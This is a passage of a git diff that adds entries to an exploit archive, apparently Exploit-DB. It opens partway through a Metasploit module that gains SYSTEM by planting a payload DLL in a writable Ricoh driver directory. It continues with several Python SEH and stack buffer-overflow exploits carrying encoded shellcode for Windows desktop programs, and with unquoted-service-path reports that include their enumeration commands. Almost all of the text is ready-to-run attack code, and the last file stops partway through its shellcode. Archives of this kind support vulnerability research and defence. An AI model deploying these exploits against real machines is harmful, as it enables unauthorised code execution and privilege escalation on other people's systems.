+    vprint_status("Vulnerable driver directory: #{@driver_path}")
+    CheckCode::Appears('Ricoh driver directory has full permissions')
+  end
+
+  def add_printer(driver_name)
+    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)
+
+    dll_data = generate_payload_dll
+    dll_path = "#{@driver_path}\\headerfooter.dll"
+
+    temp_path = expand_path('%TEMP%\\headerfooter.dll')
+    vprint_status("Writing dll to #{temp_path}")
+
+    bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
+    cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
+    bat_file = <<~HEREDOC
+      :repeat
+      #{cp_cmd} && goto :repeat
+    HEREDOC
+
+    write_file(bat_file_path, bat_file)
+    write_file(temp_path, dll_data)
+    register_files_for_cleanup(bat_file_path, temp_path)
+
+    script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
+    bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
+    print_status("Adding printer #{@printer_name}...")
+    client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
+    vprint_status("Executing script...")
+    cmd_exec(bat_cmd)
+  rescue Rex::Post::Meterpreter::RequestError => e
+    e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+  end
+
+  def exploit
+    fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
+
+    fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'
+
+    if sysinfo['Architecture'] != payload.arch.first
+      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
+    end
+
+    @driver_path = ''
+    unless check == CheckCode::Appears || datastore['ForceExploit']
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
+    end
+
+    @printer_name = Rex::Text.rand_text_alpha(5..9)
+    @script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
+    drvr_name = @driver_path.split('\\')
+    drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
+    drvr_name = drvr_name[drvr_name_idx]
+
+    add_printer(drvr_name)
+  end
+
+  def cleanup
+    print_status("Deleting printer #{@printer_name}")
+    Rex.sleep(3)
+    delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
+    client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/local/48039.py b/exploits/windows/local/48039.py
new file mode 100755
index 000000000..1717314b5
--- /dev/null
+++ b/exploits/windows/local/48039.py
@@ -0,0 +1,87 @@
+# Exploit Title: Torrent iPod Video Converter 1.51 - Stack Overflow
+# Exploit Author: boku
+# Date: 2020-02-10
+# Software Vendor: torrentrockyou
+# Vendor Homepage: http://www.torrentrockyou.com
+# Software Link: http://www.torrentrockyou.com/download/tripodconverter.exe
+# Version: Torrent iPod Video Converter Version 1.51 Build 115
+# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
+# Recreate:
+#  1) Download, install, and open Torrent iPod Video Converter
+#  2) run python script & open created 'poc.txt' file
+#  3) select-all > copy-all
+#  4) in app, click 'Register' on the bottom
+#  5) in 'Name:' textbox enter 'a'
+#  6) in 'Code:' textbox paste buffer
+#  7) click 'OK', calculator will open & app will crash
+
+# ghoul@theZiggurat# msfvenom -p windows/exec CMD=calc EXITFUNC=seh --encoder x86/alpha_upper -v shellcode -f python
+# x86/alpha_upper chosen with final size 447
+# the decoder stubs GetPC routine includes bad characters. ESI is already at PC so no need to find it. Just remove the GetPC routine in the stub.
+#shellcode = b"\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49"
+# echo -ne "\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49" | ndisasm -
+#   89E7              mov di,sp
+#   DADC              fcmovu st4
+#   D977F4            fnstenv [bx-0xc]
+#   5D                pop bp
+#   55                push bp
+#   59                pop cx
+#   49                dec cx
+shellcode  = b'\x54\x5f' # push esp # pop edi
+shellcode += b'\x56\x59' # push esi # pop ecx
+shellcode += b'\x41\x90' # inc ecx # nop # Fix the offset for GetPC
+shellcode += b'\x90\x90\x90\x90\x90' # keep the byte length the same
+shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
+shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
+shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
+shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
+shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
+shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x45\x50\x35\x50"
+shellcode += b"\x45\x50\x35\x30\x4c\x49\x4a\x45\x50\x31\x39"
+shellcode += b"\x50\x33\x54\x4c\x4b\x36\x30\x30\x30\x4c\x4b"
+shellcode += b"\x36\x32\x54\x4c\x4c\x4b\x50\x52\x32\x34\x4c"
+shellcode += b"\x4b\x53\x42\x31\x38\x44\x4f\x38\x37\x50\x4a"
+shellcode += b"\x57\x56\x30\x31\x4b\x4f\x4e\x4c\x37\x4c\x43"
+shellcode += b"\x51\x43\x4c\x54\x42\x36\x4c\x57\x50\x39\x51"
+shellcode += b"\x48\x4f\x34\x4d\x43\x31\x49\x57\x4d\x32\x4c"
+shellcode += b"\x32\x36\x32\x31\x47\x4c\x4b\x56\x32\x44\x50"
+shellcode += b"\x4c\x4b\x51\x5a\x47\x4c\x4c\x4b\x30\x4c\x44"
+shellcode += b"\x51\x43\x48\x5a\x43\x57\x38\x43\x31\x48\x51"
+shellcode += b"\x46\x31\x4c\x4b\x31\x49\x57\x50\x35\x51\x59"
+shellcode += b"\x43\x4c\x4b\x30\x49\x34\x58\x4d\x33\x57\x4a"
+shellcode += b"\x50\x49\x4c\x4b\x36\x54\x4c\x4b\x43\x31\x58"
+shellcode += b"\x56\x30\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
+shellcode += b"\x54\x4d\x55\x51\x39\x57\x47\x48\x4b\x50\x54"
+shellcode += b"\x35\x4c\x36\x45\x53\x53\x4d\x4c\x38\x47\x4b"
+shellcode += b"\x43\x4d\x47\x54\x43\x45\x4d\x34\x51\x48\x4c"
+shellcode += b"\x4b\x50\x58\x37\x54\x43\x31\x4e\x33\x53\x56"
+shellcode += b"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x30\x58\x45"
+shellcode += b"\x4c\x55\x51\x49\x43\x4c\x4b\x43\x34\x4c\x4b"
+shellcode += b"\x33\x31\x38\x50\x4d\x59\x50\x44\x57\x54\x31"
+shellcode += b"\x34\x51\x4b\x51\x4b\x45\x31\x30\x59\x31\x4a"
+shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x51"
+shellcode += b"\x4a\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x31\x4d"
+shellcode += b"\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f\x42\x45"
+shellcode += b"\x50\x55\x50\x35\x50\x56\x30\x45\x38\x56\x51"
+shellcode += b"\x4c\x4b\x42\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f"
+shellcode += b"\x4b\x4b\x4e\x44\x4e\x37\x42\x4a\x4a\x45\x38"
+shellcode += b"\x4f\x56\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x59"
+shellcode += b"\x45\x37\x4c\x43\x36\x33\x4c\x34\x4a\x4d\x50"
+shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x35\x55\x4f\x4b\x37"
+shellcode += b"\x37\x34\x53\x43\x42\x42\x4f\x53\x5a\x35\x50"
+shellcode += b"\x56\x33\x4b\x4f\x4e\x35\x32\x43\x35\x31\x52"
+shellcode += b"\x4c\x52\x43\x33\x30\x41\x41"
+
+EIP_OS   = '\x41'*(4136-len(shellcode))
+EIP      = '\x5a\x32\x4f' # 0x004f325a : call esi {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe] 
+# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent IPOD Video Converter\bsvideoconverter.exe)
+payload  = shellcode + EIP_OS + EIP
+
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/local/48041.py b/exploits/windows/local/48041.py
new file mode 100755
index 000000000..cb3bc9542
--- /dev/null
+++ b/exploits/windows/local/48041.py
@@ -0,0 +1,53 @@
+#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow
+#Exploit Author : ZwX
+#Exploit Date: 2020-02-10
+#Vendor Homepage : http://www.picture-on-tv.com/
+#Tested on OS: Windows 10 v1803
+#Social: twitter.com/ZwX2a
+
+
+## Steps to Reproduce: ##
+#1. Run the python exploit script, it will create a new file with the name "key.txt".
+#2. Just copy the text inside "key.txt".
+#3. Start the program. In the new window click "Help" > "Register ...
+#4. Now paste the content of "key.txt" into the field: "Registration Key" > Click "Ok"
+#5. The calculator runs successfully
+
+
+#!/usr/bin/python 
+
+from struct import pack
+
+buffer = "\x41" * 1608
+nseh = "\xeb\x06\xff\xff"
+seh = pack("<I",0x10014283)
+#0x10014283 : pop ebx # pop ecx # ret 0x0c |  {PAGE_EXECUTE_READ} [DVDPhotoData.dll] 
+#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll)
+shellcode =  ""
+shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+payload = buffer + nseh + seh + shellcode
+try:
+    f=open("key.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/48043.txt b/exploits/windows/local/48043.txt
new file mode 100644
index 000000000..4ee8b0e1f
--- /dev/null
+++ b/exploits/windows/local/48043.txt
@@ -0,0 +1,24 @@
+Exploit Title: freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path
+Exploit Author: boku
+Date: 2020-02-10
+Vendor Homepage: http://www.freesshd.com
+Software Link: http://www.freesshd.com/freeFTPd.exe
+Version: 1.0.13
+Tested On: Windows 10 (32-bit)
+
+C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freeftp" | findstr /i /v """
+freeFTPdService                           C:\Program Files\freeSSHd\freeFTPdService.exe                                      Auto
+
+C:\Users\nightelf>sc qc freeFTPdService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: freeFTPdService
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\freeSSHd\freeFTPdService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : freeFTPdService
+        DEPENDENCIES       : RPCSS
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/48044.txt b/exploits/windows/local/48044.txt
new file mode 100644
index 000000000..5c097ce59
--- /dev/null
+++ b/exploits/windows/local/48044.txt
@@ -0,0 +1,24 @@
+Exploit Title: FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path
+Exploit Author: boku
+Date: 2020-02-10
+Vendor Homepage: http://www.freesshd.com 
+Software Link: http://www.freesshd.com/freeSSHd.exe
+Version: 1.3.1
+Tested On: Windows 10 (32-bit)
+
+C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freesshd" | findstr /i /v """
+FreeSSHDService                           C:\Program Files\freeSSHd\FreeSSHDService.exe                                      Auto
+
+C:\Users\nightelf>sc qc FreeSSHDService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: FreeSSHDService
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\freeSSHd\FreeSSHDService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : FreeSSHDService
+        DEPENDENCIES       : RPCSS
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/48045.txt b/exploits/windows/local/48045.txt
new file mode 100644
index 000000000..f4793a789
--- /dev/null
+++ b/exploits/windows/local/48045.txt
@@ -0,0 +1,24 @@
+Exploit Title: Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path
+Exploit Author: boku
+Date: 2020-02-10
+Vendor Homepage: http://www.syncbreeze.com
+Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v12.4.18.exe
+Version: 12.4.18
+Tested On: Windows 10 (32-bit)
+
+C:\Users\elaglor>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+Sync Breeze Enterprise          C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe             Auto
+
+C:\Users\elaglor>sc qc "Sync Breeze Enterprise"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Sync Breeze Enterprise
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Sync Breeze Enterprise
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/48046.py b/exploits/windows/local/48046.py
new file mode 100755
index 000000000..853fdb6f7
--- /dev/null
+++ b/exploits/windows/local/48046.py
@@ -0,0 +1,54 @@
+#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow
+#Exploit Author : ZwX
+#Exploit Date: 2020-02-10
+#Vendor Homepage : http://www.picture-on-tv.com/
+#Tested on OS: Windows 10 v1803
+#Social: twitter.com/ZwX2a
+
+
+## Steps to Reproduce: ##
+#1. Run the python exploit script, it will create a new file with the name "name.txt".
+#2. Just copy the text inside "name.txt".
+#3. Start the program. In the new window click "Help" > "Register ...
+#4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok"
+#5. The calculator runs successfully
+
+
+#!/usr/bin/python 
+
+from struct import pack
+
+buffer = "\x41" * 256
+nseh = "\xeb\x06\xff\xff"
+seh = pack("<I",0x1004bb51)
+#0x1004bb51 : pop edi # pop esi # ret 0x0c |  {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
+#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll)
+long_buffer = "\x44" * 600
+shellcode =  ""
+shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+payload = buffer + nseh + seh + shellcode + long_buffer
+try:
+    f=open("name.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/48048.txt b/exploits/windows/local/48048.txt
new file mode 100644
index 000000000..0cc17a36a
--- /dev/null
+++ b/exploits/windows/local/48048.txt
@@ -0,0 +1,25 @@
+Exploit Title: Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path
+Exploit Author: boku
+Date: 2020-02-10
+Vendor Homepage: http://www.disksorter.com
+Software Link: http://www.disksorter.com/setups/disksorterent_setup_v12.4.16.exe
+Version: 12.4.16
+Tested On: Windows 10 (32-bit)
+
+
+C:\Users\terran>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "Disk Sorter" | findstr /i /v """
+Disk Sorter Enterprise                    C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe                            Auto
+
+C:\Users\terran>sc qc "Disk Sorter Enterprise"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Disk Sorter Enterprise
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Disk Sorter Enterprise
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/48049.txt b/exploits/windows/local/48049.txt
new file mode 100644
index 000000000..a8bf6b0a3
--- /dev/null
+++ b/exploits/windows/local/48049.txt
@@ -0,0 +1,24 @@
+Exploit Title: Disk Savvy Enterprise 12.3.18 - Unquoted Service Path
+Exploit Author: boku
+Date: 2020-02-10
+Vendor Homepage: http://www.disksavvy.com
+Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v12.3.18.exe
+Version: 12.3.18
+Tested On: Windows 10 (32-bit)
+
+C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "Disk Savvy" | findstr /i /v """
+Disk Savvy Enterprise      C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe      Auto
+
+C:\Users\nightelf>sc qc "Disk Savvy Enterprise"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Disk Savvy Enterprise
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Disk Savvy Enterprise
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/48050.py b/exploits/windows/local/48050.py
new file mode 100755
index 000000000..16da9382f
--- /dev/null
+++ b/exploits/windows/local/48050.py
@@ -0,0 +1,54 @@
+#Exploit Title: Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow
+#Exploit Author : ZwX
+#Exploit Date: 2020-02-10
+#Vendor Homepage : http://www.wedding-slideshow-studio.com/
+#Tested on OS: Windows 10 v1803
+#Social: twitter.com/ZwX2a
+
+
+## Steps to Reproduce: ##
+#1. Run the python exploit script, it will create a new file with the name "name.txt".
+#2. Just copy the text inside "name.txt".
+#3. Start the program. In the new window click "Help" > "Register ...
+#4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok"
+#5. The calculator runs successfully
+
+
+#!/usr/bin/python 
+
+from struct import pack
+
+buffer = "\x41" * 256
+nseh = "\xeb\x06\xff\xff"
+seh = pack("<I",0x100411fc)
+#0x100411fc : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
+#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll)
+long_buffer = "\x44" * 600
+shellcode =  ""
+shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+payload = buffer + nseh + seh + shellcode + long_buffer
+try:
+    f=open("name.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/48054.py b/exploits/windows/local/48054.py
new file mode 100755
index 000000000..d07804851
--- /dev/null
+++ b/exploits/windows/local/48054.py
@@ -0,0 +1,53 @@
+#Exploit Title: MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow
+#Exploit Author : ZwX
+#Exploit Date: 2020-02-11
+#Vendor Homepage : http://www.ivideogo.com/
+#Tested on OS: Windows 10 v1803
+#Social: twitter.com/ZwX2a
+
+
+## Steps to Reproduce: ##
+#1. Run the python exploit script, it will create a new file with the name "Shell.txt".
+#2. Just copy the text inside "Shell.txt".
+#3. Start the program. In the new window click "Add" > "Convert DVD" > "Movie" .
+#4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..."
+#5. The calculator runs successfully
+
+
+#!/usr/bin/python 
+
+from struct import pack
+
+buffer = "\x41" * 268
+nseh = "\xeb\x06\xff\xff"
+seh = pack("<I",0x1004f3e3)
+#0x1004f3e3 : pop ebx # pop esi # ret  |  {PAGE_EXECUTE_READ} [mysubtitle.dll]
+#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)
+shellcode =  ""
+shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+payload = buffer + nseh + seh + shellcode
+try:
+    f=open("Shell.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/48055.py b/exploits/windows/local/48055.py
new file mode 100755
index 000000000..c5a21658a
--- /dev/null
+++ b/exploits/windows/local/48055.py
@@ -0,0 +1,53 @@
+#Exploit Title: MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow
+#Exploit Author : ZwX
+#Exploit Date: 2020-02-11
+#Vendor Homepage : http://www.ivideogo.com/
+#Tested on OS: Windows 10 v1803
+#Social: twitter.com/ZwX2a
+
+
+## Steps to Reproduce: ##
+#1. Run the python exploit script, it will create a new file with the name "exploit.txt".
+#2. Just copy the text inside "exploit.txt".
+#3. Start the program. In the new window click "Options" > "Settins" .
+#4. Now paste the content of "exploit.txt" into the field: "Output Folder" > Click "..."
+#5. The calculator runs successfully
+
+
+#!/usr/bin/python 
+
+from struct import pack
+
+buffer = "\x41" * 268
+nseh = "\xeb\x06\xff\xff"
+seh = pack("<I",0x10045ebb)
+#0x10045ebb : pop edi # pop ebx # ret | {PAGE_EXECUTE_READ} [mysubtitle.dll]
+#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)
+shellcode =  ""
+shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
